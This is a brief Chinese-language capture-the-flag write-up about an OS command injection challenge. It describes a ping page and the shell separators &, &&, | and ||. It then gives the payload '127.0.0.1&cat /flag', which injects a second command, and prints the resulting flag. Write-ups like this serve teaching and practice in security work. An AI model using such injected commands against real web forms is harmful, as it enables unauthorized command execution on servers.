打开该靶机,发现该页面为一个ping页面
输入127.0.0.1测试,发现和电脑cmd上ping的结果差不多
分析一下ping小技巧
&,&&,|,|| 的区别:
构造payload
127.0.0.1&cat /flag
得到该题的flag
flag{e166f81d-5663-4153-b837-c6484858bf25}